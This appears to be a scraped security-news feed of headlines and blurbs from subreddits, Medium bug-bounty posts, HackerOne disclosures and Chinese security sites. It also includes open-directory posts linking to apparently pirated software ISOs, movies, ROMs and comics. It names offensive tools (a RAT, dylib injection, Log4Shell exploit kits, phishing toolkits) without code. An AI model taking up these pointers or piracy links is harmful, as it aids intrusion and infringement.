    Don't ask why, I know most companies don't give a crap, I know they prefer experience, etc... Until I can get a job that isn't with my current employer/in this sector, I have to play the game as best I can. I am trying to find both a cheap and good masters degree program I can do part time and online (or at least one that is ABET\would make managers who only care about ABET happy). I am both looking at computer science and cybersecurity masters, but I got a B.S. in cybersecurity which makes masters of computer science hard to get into. So far, the only one I have found that checks those boxes is Georgia Tech's online masters (though I seriously doubt they will let me in the computer science program so I will have to do the cybersecurity one). I keep digging around but it seems all the ones I can find either charge high rates, and/or lack anything actually being taught. Do you guys know of any? All the digging around I have done has shown me that it's that or get ready to fork out 30k+ (if I didn't already pay too much for my B.S.). submitted by /u/RandomPerson05478 [link] [comments]  ( 2 min )
    Is NET::ERR_CERT_DATE_INVALID a sure sign of danger?
    "Your connection is not private Attackers might be trying to steal your information from www.url.example (for example, passwords, messages, or credit cards). Learn more NET::ERR_CERT_DATE_INVALID" Hello, Recently (past few days) I have been taking up an avenue of search that has led me to many primeval websites from 2009 and earlier, and I have noticed a frequent pattern that Chrome does not want me to access these websites. However, I am having a hard time figuring out if the websites are actually dangerous or, in typically invasive fashion, the Chrome devs have simply put a roadblock in the way of accessing sites that aren't up to current standards (because sometimes they MIGHT be dangerous). Again, this is happening to rather old and niche websites from the birth of the internet. At the bottom of the warning page is a large, friendly button, saying, "Take me back to safety", which links to the chrome homepage. Thanks, and apologies if I have broken the sub rules somehow submitted by /u/Icy_Ad2505 [link] [comments]  ( 1 min )
    What is the general best practice for preventing brute force attacks while minimizing user impact?
    I am trying to understand how to best prevent bruteforcing attacks on various externally accessible services. If you limit the amount of attempts for a given account, then you solve the bruteforcing quandary but introduce another attack vector where someone can indefinitely lock out legitimate users out of their accounts by just knowing their username. You can limit it by something like IP, but there have been several real world examples which show how cheap it is to quickly spin up thousands of different IPs to bypass this protection via AWS/Azure. I'm not aware of any other techniques that could identify legitimate requests from illegitimate ones. My thinking was something like a system in which successful logins log the IP from which it was accessed and allow login attempts from that IP even if the user is locked out. However that also has some underlying issues. What is the general security best practice for this sort of attack? submitted by /u/awedRaisins7 [link] [comments]  ( 5 min )
  • Open

    What is fuzzing? Why is it used?!
    Fuzzing is one of the most important activities that hackers or #BugHunters, or better to say #PenTesters, use for… Continue reading on Medium »  ( 1 min )
  • Open

    The Who 24 Bit Vinyl Pack
    http://www.xuxinlei.com/downloads/The%20Who%2024%20Bit%20Vinyl%20Pack/ [DIR] 1967 - The Who - The Who Sell Out [24-96]/ 2021-12-28 13:42 - [DIR] 1968 - The Who - Dogs & Call Me Lightning (mono single, 24-96)/ 2021-12-28 13:42 - [DIR] 1969 - Tommy [vinyl]/ 2021-12-28 13:42 - [DIR] 1971 - The Who - Meaty Beaty Big And Bouncy (24-96)/ 2021-12-28 13:42 - [DIR] 1974 - The Who - Odds & Sods/ 2021-12-28 13:42 - [DIR] The Who - A Quick One [24-96]/ 2021-12-28 13:42 - [DIR] The Who - My Generation (1965) [flac] {CR 200g, mono, 24-96}/ 2021-12-28 13:42 - [DIR] The Who - Quadrophenia (1973) [VINYL] {24-96} {Classic 200g Quiex SV-P}/ 2021-12-28 13:42 - [DIR] The Who - Who’s Next 1971/ 2021-12-28 13:42 - submitted by /u/Dagad0s [link] [comments]  ( 1 min )
    music, movies, tv
    small bit of Iranian music Index of /music/Various-Artists--Artesh-128 (r3d-dl.online) more music Index of /music/playlist (blackthebeastmusic.com) movies and tv series (Only some with English audio) Index of /download (zoppello.fr) submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Old scene releases (1999-2007)
    https://c64.rulez.org/pub/c64/Scene/Old/ submitted by /u/-ForFuckSake [link] [comments]
    Some scene releases for software, games and other things
    http://75.86.210.23/archive/ submitted by /u/-ForFuckSake [link] [comments]  ( 1 min )
    Metroid (GBA) hacks and scripts
    submitted by /u/Pleasant_Jelly_8397 [link] [comments]
    NES, SNES, GBA roms
    submitted by /u/Pleasant_Jelly_8397 [link] [comments]  ( 1 min )
    Images of "tiers" (memes)
    submitted by /u/Pleasant_Jelly_8397 [link] [comments]
    RPG rulebooks
    submitted by /u/Pleasant_Jelly_8397 [link] [comments]
    various stuff
    Music (amateur bands, I guess) Index of /audio (randanderson.com) Music mashups, Oasis, Christmas and non music stuff. Index of /ayrshiredj/website/Stuff (seedhost.eu) christmas songs. Make a playlist Musical index of /radio/christmas/ (foamtotem.org) submitted by /u/International_Milk_1 [link] [comments]
  • Open

    cedowens/Inject_Dylib: Swift code to programmatically perform dylib injection
    submitted by /u/dmchell [link] [comments]
  • Open

    Turning off Wi-Fi & Bluetooth interfaces automatically in iOS
    submitted by /u/hoytva [link] [comments]
    A simple, high-level framework on how & when to effectively use WAFs
    submitted by /u/jubbaonjeans [link] [comments]  ( 3 min )
    Kickstop the Blind Ego (BlindEagle writeup by sn0wmonster from 2016)
    submitted by /u/sn0wm0nster [link] [comments]
  • Open

    How I was able to bypass a Pin code Protection
    Hello guys, I hope all are doing good. My name is kerolos sameh (AKA xko2x), I’m 17 years old bug hunter in hackerone. Continue reading on Medium »  ( 2 min )
    He is already here: Privileges escalation due to invalidating current users
    Dear his/her we back again our story today is about privileges escalation This vulnerability enables the unauthorized user to add an… Continue reading on Medium »  ( 2 min )
    The Story Of How I Bypass SSO Login
    Hello everyone, Continue reading on Medium »  ( 2 min )
    elasticpwn: how to collect and analyse data from exposed Elasticsearch and Kibana instances
    Your Elasticsearch and Kibana instances are open, and that’s a real problem.. Continue reading on Medium »
    Bug Bounty Recon: Vertical Correlation (and the secret to succeeding).
    Vertical Correlation — The process of finding subdomains from a root domain. Continue reading on Medium »  ( 6 min )
  • Open

    EMAIL SPOOFING
    Khan Academy disclosed a bug submitted by hackthedevil: https://hackerone.com/reports/496360
    Default credentials lead to Spring Boot Admin dashboard access
    8x8 disclosed a bug submitted by sparroww: https://hackerone.com/reports/1417635
  • Open

    SecWiki News 2022-01-02 Review
    playwright: Playwright is a framework for Web Testing and Automation (crawler) by ourren For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    @RealTryHackMe #AdventOfCyber Series: Challenge 16 — Ransomware Madness #TisTheSeasonForHacking
    Another day, another challenge… Continue reading on Medium »  ( 1 min )
    OSINT — Free Tools for better Satellite Imagery
    Hello Everyone, in this article we will be looking at some of the free and effective tools for Satellite imagery. Every tool has got some… Continue reading on Medium »  ( 2 min )
  • Open

    Intigriti’s December XSS challenge By E1u5iv3F0x
    This year’s Christmas challenge is crafted by E1u5iv3F0x. It was very original and educational. Continue reading on Medium »  ( 3 min )
  • Open

    ZIP file has been "obfuscated" and claims to be the 65536th part of a multi-volume archive. (cannot extract)
    submitted by /u/GalaxyDan2006 [link] [comments]  ( 1 min )
    My college gave me a voucher for the CHFI. What study material exists for it?
    Title really says it all. I am aware of people's views on EC-Council and hold some of my own but it's a free voucher and looks good. submitted by /u/threadstalkerpoint1 [link] [comments]  ( 1 min )
  • Open

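    [Translation] [Paper] BBR: Congestion-Based (Rather Than Loss-Based) Congestion Control (ACM, 2017)
    Translator's preface: This article is a translation of Google's 2017 paper: Cardwell N, Cheng Y, Gunn CS, Yeganeh SH, Jacobson V. BBR: congestion-based congestion control. Communications of the ACM. 2017 Jan 23;60(2):58-66. Paper subtitle: Measuring Bottleneck Bandwidth and Round-trip propagation time. Before BBR, the mainstream TCP congestion control algorithms were all loss-based designs, an assumption that dates back to the 1980s and 1990s, when link bandwidth and memory capacity were measured in Mbps and KB respectively and link quality (by today's standards) was also poor. More than thirty years later, both of these physical capacities have grown by at least six orders of magnitude, and link quality is incomparably better. In particular, in modern infrastructure, packet loss and latency do not necessarily indicate that the network is congested, so the original assumption no longer holds. Starting from this fundamental problem, Google's networking team (building on prior work) designed and implemented a new congestion control algorithm based on congestion itself rather than on packet loss or latency, abbreviated BBR. Put simply, BBR uses the RTT information in acknowledgment packets (ACKs) and the number of bytes sent to compute the actual delivery rate, then uses the latter to adjust the client's subsequent sending rate, keeping a reasonable amount of inflight data so that transmission bandwidth is maximized and transmission latency is minimized. In addition, it runs entirely on the sender side and requires no changes to the protocol, the receiver, or the network, so it is relatively easy to deploy. Google's global WAN (B4) had already switched all of its TCP traffic from CUBIC to BBR in 2016, improving throughput by 2 to 25 times; after some configuration tuning, this rose even further, to 133 times (…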

  • Open

    A persistent denial of service vulnerability affecting iOS
    Article URL: https://trevorspiniolas.com/doorlock/doorlock.html Comments URL: https://news.ycombinator.com/item?id=29762490 Points: 48 # Comments: 12  ( 4 min )
  • Open

    Mythology and Occultist Books.
    https://www.magicgatebg.com/Books/ Looks to be both books on mythology and occultist practices. Pretty small >1gb I think. Gotta wade through some crap, but there appears to be some good resources here. submitted by /u/GiantFangedBanana [link] [comments]  ( 1 min )
    My First Contribution
    Here's a bunch of cord-cutting apps (Firestick/Android TV) https://dr-venture.com/apks/ submitted by /u/Buddy-the-elf321 [link] [comments]
    pictures of carpet
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    iron maiden albums zipped -(SEE COMMENT for content.) Happy new year everybody
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
  • Open

    WHAT IS OSINT?
    OSINT (Open Source Intelligence) means open-source intelligence. In short, we can say it is a passive information-gathering tool. Passive… Continue reading on Medium »  ( 2 min )
  • Open

    How I Reverse-Engineered one of the biggest GSM Operator’s application.
    This is a story of how I found a critical bug in one of the biggest GSM Operator’s application in our country. Continue reading on Medium »  ( 5 min )
    AlbusSecurity:- Penetration-list 01 Information Disclosure — Part 1
    Hello Listeners, I hope you all are well. Firstly I will introduce myself I’m Aniket, I’m an Information technology officer at 5f eco… Continue reading on Medium »  ( 3 min )
    Oversimplified — Bug Bounty
    Undoubtedly, most of us believe that finding vulnerabilities in the software looks something like the image above. “Hacking” has always… Continue reading on Medium »  ( 5 min )
    UNAUTHORIZED ACCESS LEADS TO PII DATA LEAKAGE
    Hello Everyone, Continue reading on Medium »  ( 2 min )
    One Click To Account Takeover
    Hello amazing hunters. Continue reading on Medium »  ( 1 min )
    A tale of zero click account takeover
    Hello there! I hope everything is going well with you; today I’m back with the story of my first critical discovery on Hackerone, which is… Continue reading on Pentester Nepal »  ( 3 min )
  • Open

    Go Fuzzing
    Article URL: https://tip.golang.org/doc/fuzz/ Comments URL: https://news.ycombinator.com/item?id=29761092 Points: 175 # Comments: 49  ( 3 min )
  • Open

    I found and fixed a vulnerability in Python's source code
    submitted by /u/sn1pr0s [link] [comments]  ( 1 min )
    Fixing the Unfixable: Story of a Google Cloud SSRF
    submitted by /u/xdavidhu [link] [comments]  ( 1 min )
    Build your own reconnaissance system with Osmedeus Next Generation
    submitted by /u/j3ssiejjj [link] [comments]  ( 1 min )
  • Open

    AQUATIC PANDA in Possession of Log4Shell Exploit Tools
    submitted by /u/dmchell [link] [comments]
    Phishing o365 spoofed cloud attachments
    submitted by /u/dmchell [link] [comments]
    Windows Process Listing using ToolHelp32 API
    Get a detailed walk-through on the code of process listing using ToolHelp32 API from scratch. You will also learn to enumerate the threads and modules for each process and will know about its advantages and challenges https://tbhaxor.com/windows-process-listing-using-toolhelp32/ submitted by /u/tbhaxor [link] [comments]
    Code snippets for windows api exploitation for red and blue teams
    https://github.com/tbhaxor/WinAPI-RedBlue submitted by /u/tbhaxor [link] [comments]
  • Open

    SecWiki News 2022-01-01 Review
    2021 security architecture summary and 2022 security outlook by ourren For more of the latest articles, visit SecWiki
  • Open

    A question about subnetting.
    I'm very new to networking so apologies if this is a stupid question. I'm given a network ID of 172.16.1.0 /24. I need to subnet this for LAN 1 (60 hosts) and LAN 2 (20 hosts). I believe my network ID for LAN 1 will be 172.16.1.0 /26, and for LAN 2 it will be 172.16.1.64 /27. The issue is, when I try to assign LAN 1's network ID to G/0/0/0 with the subnet mask of 255.255.255.192 it doesn't work. I understand that it's class B which is usually 255.255.0.0, but if the CIDR is /26 shouldn't it be 255.255.255.192 despite this? Any feedback would be greatly appreciated, thank you! submitted by /u/crumbjuice [link] [comments]  ( 2 min )
  • Open

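    How to use ChopChop to scan endpoints and identify exposed sensitive content
    Helps researchers perform dynamic application testing against web applications.  ( 1 min )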

  • Open

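    The story of my main weapon ⚔️ (ZAP and Proxify)
    By Korean time there are about 30 minutes left until the new year, and this looks like it will be my last post of the year. It feels like I wrote my 2020 retrospective not long ago, yet the 2021 retrospective is already behind me too 😱 Today I want to talk about my Main Weapon, one of the topics from my retrospective :D Main Weapon? Which tool do you like best when doing analysis? The one tool you would pick here is what I consider the Main Weapon. I was a Burpsuite user for a long time, my interest in ZAP grew strongly again from around 2018, and in the end I stuck with a dual style of using Burpsuite and ZAP at the same time until last year.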
  • Open

    Should I Block/Disable ICMP on router Firewall?
    Should I disable ICMP ports on my ISP's router's firewall? I have heard a mix of different things. I'm trying to increase security, but I understand it will impact network monitoring by disabling it. I'm looking to disable ping. This router doesn't have many options besides disabling incoming & outgoing and setting custom rules. Should I just disable incoming ICMP? What can I do, if anything, that will increase security of ICMP? submitted by /u/Wind0ze_User [link] [comments]  ( 2 min )
    Tiktok
    1. Is it true that TikTok app is spyware? Can they access and watch us through our phone's camera even when we're not using the app? 3. If this is true, then how is that even legal to spy on users? Especially minors, who use this app more. submitted by /u/hamza_37 [link] [comments]  ( 3 min )
    Spyware
    Will a malware/virus/spyware still exist even after you uninstall an app from playstore or not? I downloaded many strange apps from google playstore ,uninstalled them and ran a Malwarebytes scan and nothing bad showed up, should I still be worried? submitted by /u/hamza_37 [link] [comments]  ( 1 min )
    About blockchain dapps security
    Hello, I'm a pen testing student doing my OSCP right now and I'm interested in blockchain and dapp security/pentesting. Is there a roadmap? What skills must I acquire to get me there besides learning a dapp language like plutus or solidity? Thanks in advance! submitted by /u/GeorgiosSAK [link] [comments]  ( 1 min )
  • Open

    Open-Source Intelligence (OSINT) Reconnaissance
    *Note: This article was originally published by the author on November 5, 2018, as part of the Peerlyst Red Team Book collaboration. Continue reading on Medium »  ( 8 min )
    OSINT tweets liked by @aqfiazfan in Jan — Dec 2021
    I always use the likes feature on Twitter as an important cabinet for storing OSINT-related information that I find interesting… Continue reading on Medium »  ( 1 min )
    TryHackMe — Sakura Walkthrough
    Sakura is an OSINT-focused room created by The OSINT Dojo. The room is designed to test a variety of OSINT techniques, such as social… Continue reading on Medium »  ( 5 min )
  • Open

    Evasion & Obfuscation Techniques
    *Note: This article was originally published by the author on November 7, 2018, as part of the Peerlyst Red Team Book collaboration. Continue reading on Medium »  ( 10 min )
  • Open

    Over 2.2k fonts that you can extract to your Fonts folder. (.ttf / .otf)
    Hey everyone, I have a zip file that has over 2.2k fonts that you can just extract into your Fonts folder, for example: C:\Windows\Fonts Here is the zip file, hope everyone enjoys. zip: https://drive.google.com/file/d/1bk_CFZn8CYeYDX_yiE_CPNVh4aKz2Oea/view?usp=sharing (G.Drive) submitted by /u/imjustalazyretard [link] [comments]  ( 1 min )
    My OD. Movies, Documentaries, Music, Software, ISO's and some other data.
    https://truth-or-ner.xyz/shared/ A little bit of my personal data hoard. Server has 1Gbit/s upload speed so you can grab what you want pretty quickly. Enjoy. Also happy new year! I believe that HTTPS is important but here's a link if you want to access the site without it: http://truth-or-ner.xyz/shared/ Some examples from the OD, what to expect: ISO's: Adobe Master Collection 2021, Windows 7 original, untouched versions Movies and Series: Karen, The Death of Stalin, Paper Towns, Nanny McPhee, Hidden Figures, The billion dollar code[series] Docu: Pandas 2018 docu, Inside facebook - Secrets Of A Social Network, The British Empire in Colour (3 ep) Music: mainly 2010's pop and dance I have uploaded a few more stuff since KoalaBear made the OD scan, so here's a new one: Extension (Top 5) Files Size .mkv 20 70.73 GiB .iso 6 42.51 GiB .mp4 9 12.99 GiB .zip 9 5.25 GiB .flac 49 1.69 GiB TOTAL 117 133.43GiB ​ submitted by /u/techleves [link] [comments]  ( 1 min )
    Top 250 imdb movies - But see comment
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Books/Manuals (includes Harry Potter, Alex Rider)
    submitted by /u/International_Milk_1 [link] [comments]
    runaways comics
    submitted by /u/International_Milk_1 [link] [comments]
    Ace Books (https://en.wikipedia.org/wiki/Ace_Books)
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Comics - Google Drive (let's see if this lasts any longer)
    submitted by /u/International_Milk_1 [link] [comments]
    some vertigo comics
    submitted by /u/International_Milk_1 [link] [comments]
    75 Gigs of Docs direct dl and w/torrent available
    https://archive.org/details/pbsnovadocs submitted by /u/SingingCoyote13 [link] [comments]  ( 1 min )
    Image hosting site, mainly photos for auctions
    https://www.datazap.net/sites/ Did not see any nsfw, but did not look at everything submitted by /u/c-rn [link] [comments]
  • Open

    serpentine - C++/Win32/Boost Windows RAT (Remote Administration Tool) with a multiplatform Java/Spring RESTful C2 server and Go, C++/Qt5 frontends
    submitted by /u/jafarlihi [link] [comments]  ( 1 min )
    New year, new password habit
    submitted by /u/Novel_Author [link] [comments]  ( 1 min )
  • Open

    Javascript 101 — Comparison & Conditions — 04
    Before reading that article you can also check Javascript-101 Embedding objects and arrays. Continue reading on Medium »  ( 3 min )
    My first Google HOF
    Whoever starts learning about bug hunting, their dream is to get a bounty and HOF from Google. I too got successful in June 2021 when I… Continue reading on Medium »  ( 2 min )
    AWS Lambda Command Injection
    Command Injection vulnerability is a daunting one. In this vulnerability, a threat actor can execute arbitrary commands on a host. Continue reading on Towards AWS »  ( 4 min )
  • Open

    SecWiki News 2021-12-31 Review
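    Long read: A brief ten-year history of the Internet of Things by ourren Typora license decryption and analysis by ourren For more of the latest articles, visit SecWiki  ( 2 min )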
  • Open

    @RealTryHackMe #AdventOfCyber Series: Challenge 5 — Pesky Elf Forum
    Another day, another challenge… Continue reading on Medium »  ( 1 min )
    @RealTryHackMe #AdventOfCyber Series: Challenge 4 — Santa’s Running Behind
    Another day, another challenge… Continue reading on Medium »  ( 1 min )
  • Open

    Improper authorization allows disclosing users' notification data in Notification channel server
    LINE disclosed a bug submitted by 66ed3gs: https://hackerone.com/reports/1314162 - Bounty: $2000
    ADB Backup is enabled within AndroidManifest
    Zivver disclosed a bug submitted by hack_4fun: https://hackerone.com/reports/1225158
  • Open

    PIT HackTheBox Walkthrough
    Pit is a CTF Linux box with difficulty rated as a medium on Hack The Box platform. Let’s deep dive into breaking down this machine. The post PIT HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

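    FreeBuf Morning Report | 77 TB of Kyoto University data deleted by mistake; 5 cybersecurity trends to watch in 2022
    Kyoto University in Japan posted a notice on its website stating that, due to an error in the backup system of its HP supercomputer, the university lost approximately 77 TB of research data.  ( 1 min )
    FreeBuf in-house security group discussion | Year-end review: 2021 for in-house security practitioners
    Which events this year left a deep impression on you, what did they make you think about, and what is your view of the industry's current state and direction? Or even, talking about the profession itself, what are your plans for your future career development?  ( 1 min )
    FreeBuf Weekly | "14th Five-Year Plan" for National Informatization released; Apache fixes critical vulnerability
    We have summarized and recommended this week's hot news, quality articles and handy tools, so that you do not miss any of this week's highlights!  ( 1 min )
    Analysis of the Kimsuky group's phishing campaign targeting the South Korean news industry
    Kimsuky is a cyber-espionage group suspected to originate from the Korean Peninsula that has been active since at least 2012.  ( 1 min )
    Why reducing friction between developers and security teams helps improve software security
    Rather than deferring security until later, make it a core part of the development process.
    Penetration testing, groundwork services series: service attack and defense, the Struts2 framework (part 1)
    Struts2 is a web framework under the Apache project, widely used by Internet companies such as Alibaba and JD.com and by government and enterprise portal sites.  ( 1 min )
    New malware iLOBleed rootkit targets HP iLO firmware for the first time
    iLOBleed is the first malware ever to target HP iLO firmware.  ( 1 min )
    HP supercomputer system error in Japan: up to 77 TB of Kyoto University data deleted by mistake
    Kyoto University in Japan posted a notice on its website stating that, due to an error in the backup system of its HP supercomputer, the university lost approximately 77 TB of research data.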
  • Open

    Windows Process Listing Using WTS API
    In these detailed walkthroughs of process listing using WTS API, you will learn the importance of the process listing and enumeration of anti-malware agents and will get your hands dirty with the source code https://tbhaxor.com/windows-process-listing-using-wtsapi32/ https://tbhaxor.com/windows-process-listing-using-wtsapi32-2/ submitted by /u/tbhaxor [link] [comments]

  • Open

    Movies and tv, but not sure how much in english. Seems to be very slow.
    submitted by /u/International_Milk_1 [link] [comments]
    Racer X stuff
    submitted by /u/International_Milk_1 [link] [comments]
    Creating your own flair
    So you want to share a link to top secret documents. You want to call the Flair "Could get you killed" Just pick any of the default flairs, enter it in document, highlight it, and write "could get you killed" instead. submitted by /u/International_Milk_1 [link] [comments]
    comics, and Ebooks
    submitted by /u/International_Milk_1 [link] [comments]
    Kamen Rider Build BD Box Complete Series [1080p]-english subs
    submitted by /u/International_Milk_1 [link] [comments]
    Star Trek films, movies. comics. etc etc
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Ghibli's Films - Google Drive
    submitted by /u/International_Milk_1 [link] [comments]
    Bond movies (Not sure if this is correct link)-see comment
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Games (don't know if links work)
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Tom and Jerry cartoons
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    comics
    submitted by /u/International_Milk_1 [link] [comments]
    Movies
    http://167.114.174.132:9092/movies/ Haven't looked too far thru this yet but good amount of movies. submitted by /u/Prhymus [link] [comments]
    Indian (I'm assuming) music
    submitted by /u/International_Milk_1 [link] [comments]
  • Open

    Not only cybersecurity
    Hi, I really love cybersecurity stuff, but as I practice with TryHackMe/HackTheBox labs, I feel that some programming knowledge is also required. What are your studying topics, besides offensive/defensive techniques? Can you recommend some good resources for PHP, assembler, javascript and so on? Thank you!! submitted by /u/g-simon [link] [comments]  ( 1 min )
    DNSSEC with unsigned records set
    Hello everyone, I'm currently implementing a DNSSEC validator (at https://github.com/qdm12/dns). It's working so far, but most zones aren't signed (even google.com it seems). How is a DNSSEC validator meant to handle unsigned cases? Should it just let it through without any validation? Or should it check somewhere else if a zone is meant to be signed? Or should we patiently wait for DNSSEC to be more widely adopted? I'm wondering for example in the case an attacker hacks an authoritative nameserver like Cloudflare's 1.1.1.1 and returns bad records without their previously existing RRSIG signatures. A DNSSEC validator (without caching or on a cold boot) will not detect the bad records from Cloudflare right? Thanks in advance! submitted by /u/dowitex [link] [comments]  ( 1 min )
    Are Server+, Cloud+, and Linux+ certifications useful for InfoSec?
    submitted by /u/Connect_Estate_8617 [link] [comments]  ( 1 min )
    I accessed someone else's Yahoo mail by mistake. This needs to get fixed ASAP
    hello everyone I got a new phone number, and something really unbelievable happened to me: I was able to access someone else's Yahoo! mail account - the previous user of that phone number. I Googled it to see if anyone else has experienced this, and cybersecurity expert Brian Krebs reports that has in this article: https://krebsonsecurity.com/2019/03/why-phone-numbers-stink-as-identity-proof/ From the article itself : " This is exactly what happened recently to a reader who shared this account: A while ago I bought a new phone number. I went on Yahoo! mail and typed in the phone number in the login. It asked me if I wanted to receive an SMS to gain access. I said yes, and it sent me a verification key or access code via SMS. I typed the code I received. I was surprised that I didn’…  ( 4 min )
    Is IT experience a requirement for SOC Analyst?
    Is it required that you worked in the help desk or be a sysadmin? If so, how many years? Or is home experience enough for the role (example: homelab, ctfs, github projects) submitted by /u/RaZdoT [link] [comments]  ( 2 min )
    Phone Tapping -- Call Forwarding UNconditionally, but everything else is NOT forwarded
    So I checked my dad's phone for tapping. This is what the system message said: Call forwarding unconditionally. Voice: Not forwarded Data: Not forwarded FAX: Not forwarded SMS: Not forwarded Sync: Not forwarded Async: Not forwarded Packet: Not forwarded PAD: Not forwarded OK Given the info above, is he still being phone tapped? Last time, he was and I saw the number. Now I didn't. submitted by /u/Then-Mathematician76 [link] [comments]  ( 1 min )
    Are You Running Linux As Your Main Workstation?
    Are you running Linux as your main workstation? What do the professionals run as their main operating system? submitted by /u/No_Secret6425 [link] [comments]  ( 2 min )
    Offsec Discontinue Kali on Azure?
    Did Offensive Security discontinue support for Kali on the Azure cloud? https://github.com/Azure/azure-cli/issues/17469 Found this thread and can’t find Kali in the azure marketplace or on their site anymore. submitted by /u/DeadbeatHoneyBadger [link] [comments]
  • Open

    Ffuf TryHackMe par
    Writeup  ( 2 min )
    Easy Premium Account Access and Admin role escalation via Object manipulation in the server…
    Hey infosec Geeks ✌,  ( 2 min )
    HacktoberFest2k21 vulnerability: How users metadata can be changed via Auth JWT tokens leaking from…
    Hello Awesome readers 👨‍💻✌✌,  ( 3 min )
    Cookie Stealing via Clickjacking using Burp collaborator
    Hello 👋 infosec geeks 👨‍💻 this is my 4th blog post,  ( 2 min )
    Massive Users Account Takeovers(Chaining Vulnerabilities to IDOR)
    Hello hunters 👋✌ this is my 7th writeup 🧾,  ( 3 min )
    CTF Write-Up: Kryptonite
    CTF challenge available at ctf-mystiko.com.  ( 5 min )
  • Open

    Read-only user can edit user segments.
    Mail.ru disclosed a bug submitted by astates: https://hackerone.com/reports/1277753
    DLL hijacking in Monero GUI for Windows 0.17.3.0 would allow an attacker to perform remote command execution
    Monero disclosed a bug submitted by fukuyama: https://hackerone.com/reports/1437942
    API- /
    VK.com disclosed a bug submitted by executor: https://hackerone.com/reports/1354452
    Change project visibility to a restricted option
    GitLab disclosed a bug submitted by s4nderdevelopment: https://hackerone.com/reports/1086781 - Bounty: $1370
  • Open

    Windows Privilege Escalation: Kernel Exploit
    As this series was dedicated to Windows Privilege escalation thus I’m writing this Post to explain command practice for kernel-mode exploitation. Table of Content What The post Windows Privilege Escalation: Kernel Exploit appeared first on Hacking Articles.  ( 5 min )
  • Open

    Here’s How I Could Read Anyone’s Iphone Metrics Remotely.
    Hello, My name is Faizan. I’m a security researcher. Hope you like this blog. If you’ve any questions please feel free to reach out . Continue reading on Medium »  ( 2 min )
    TryHackMe Writeup : Solar, exploiting Log4J
    Hi there, Continue reading on Medium »  ( 6 min )
    Javascript 101 - Embedding objects & Arrays — 03
    Before reading this, you can look at Javascript 101 — Arithmetic Operators, Code Editors, Functions, Objects, and Arrays — 02. Continue reading on Medium »  ( 3 min )
    Caduceus Bug Bounty Challenge
    Caduceus has just entered its public testing phase and is launching this hackathon to identify bugs. Continue reading on Medium »  ( 2 min )
    Bitswift Unlimited Mint Bugfix Postmortem
    Summary Continue reading on Immunefi »  ( 4 min )
    The Password Bypass Leads to Full-Account-Takeover
    Hola Hackers, I’m Saransh Saraf aka MR23R0 Continue reading on Medium »  ( 1 min )
  • Open

    [Cellebrite Physical Analyzer] Basic usage question, easily resuming a session/case with multiple extractions
    Just started working with this program. I understand how to open and browse extractions, but I can't figure out if there's a better way to pick up where I left off after closing the program, I end up having to open/import all the extractions one by one again. For most programs that I'm familiar with, a "case" contains one or more extractions that I imported and "opening a case" tends to be a convenient way to bring up all the extractions in one "click". However, based on how little experience I have with PA, "opening a case" seems to just be a prompt to import extractions all over again. I thought about using "project sessions", but it seems to be something that you open after all the extractions are open that remembers what analysis you've done, not necessarily what devices you were working on. Can anyone speak to this? Am I oblivious to a basic function that lets me easily open all the extractions I had open? Maybe I'm supposed to create a portable case (UFDX?) or something? submitted by /u/PieWithIceCreamCrust [link] [comments]  ( 2 min )
  • Open

    SecWiki News 2021-12-30 Review
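    Analysis of the ZN600 China Telecom optical modem: first look by ourren A rich-text security filtering scheme written for developers by ourren Tenda AX12 router device analysis (part 2): the UPnP protocol by ourren A tool that finds JSP webshells through taint tracking by ourren A tool implementation for quickly probing a target firewall's outbound ports by ourren Talking about configuration-file RCE by ourren A scanner performance analysis case study by ourren Kernel-mode eBPF programs for container escape and a hidden-account rootkit by ourren Software supply chain security development insight report (2021) by ourren For more of the latest articles, visit SecWiki  ( 2 min )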
  • Open

    I wrote a replacement for Pyrasite to inject code into Python processes on Kubernetes
    submitted by /u/nyellin [link] [comments]  ( 1 min )
    Bootkit samples
    submitted by /u/hardenedvault [link] [comments]
  • Open

    TryHackMe | CTF | Walkthrough | Raven
    Checkout this virtual machine on TryHackMe. LogIn on TryHackMe, go to rooms → raven1he. Link: https://tryhackme.com/room/raven1he Continue reading on Medium »  ( 3 min )
  • Open

    Upgrade your OSINT investigations with Maltego
    What is Maltego anyway? Continue reading on Medium »  ( 1 min )
    OSINT — Sakura (TryHackMe walktrough)
    The OSINT Dojo recently found themselves the victim of a cyber attack. It seems that there is no major damage, and there does not appear… Continue reading on Medium »  ( 2 min )
  • Open

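    FreeBuf Morning Report | WeChat mini programs need authorization to access personal information; Amazon's Alexa voice assistant oversteps
    Starting February 21, 2022, mini programs must obtain user authorization to access Bluetooth and contacts and to add calendar events.  ( 1 min )
    Threat hunting architecture and practice | A first look at the CIS 2021 Spring edition conference topics
    Threat hunting is currently recognized in the industry as one of the most effective proactive security solutions, and it can minimize the harm cyberattacks cause to enterprises.  ( 1 min )
    T-Mobile says: user data breach was caused by SIM swapping attacks
    US telecom carrier T-Mobile suffered a data breach in which an unknown number of customers were subjected to SIM swapping attacks.
    Building DevSecOps: white-box sequel
    Exploring a tool that can both meet an enterprise's internal automated auditing needs and help white hats quickly find vulnerabilities in day-to-day work.  ( 4 min )
    IoT honeypots show the network threats facing IoT devices
    Honeypots have historically been used as decoy devices to help researchers better understand the dynamics of threats on the network and their impact.  ( 1 min )
    More than 1,200 websites use MitM phishing toolkits that allow cybercriminals to bypass 2FA authentication
    Man-in-the-middle phishing toolkits are real-time phishing toolkits that need no human operation, because everything is done automatically through a reverse proxy.  ( 1 min )
    Summary and analysis of ThinkPHP5 deserialization exploit chains
    This article summarizes and analyzes the deserialization exploit chains in ThinkPHP 5.0 and 5.1, partly to have them on hand when needed and partly as an in-depth study of PHP deserialization.  ( 6 min )
    Incident response: Trojan detection with Yara rules
    Yara is a rule-based malicious sample analysis tool that helps security researchers and blue teams analyze malware, and it allows custom detection rules to be used to detect malware during incident response and forensics.  ( 1 min )
    Subway security screening gates reported to have multiple serious security vulnerabilities
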